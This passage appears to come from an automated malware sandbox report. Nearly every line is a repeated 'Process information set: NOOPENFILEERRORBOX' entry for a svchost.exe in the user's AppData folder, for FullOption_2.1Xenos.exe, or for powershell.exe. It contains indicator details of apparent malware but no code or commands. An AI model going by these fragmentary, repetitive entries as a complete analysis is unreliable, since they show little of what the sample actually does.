                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
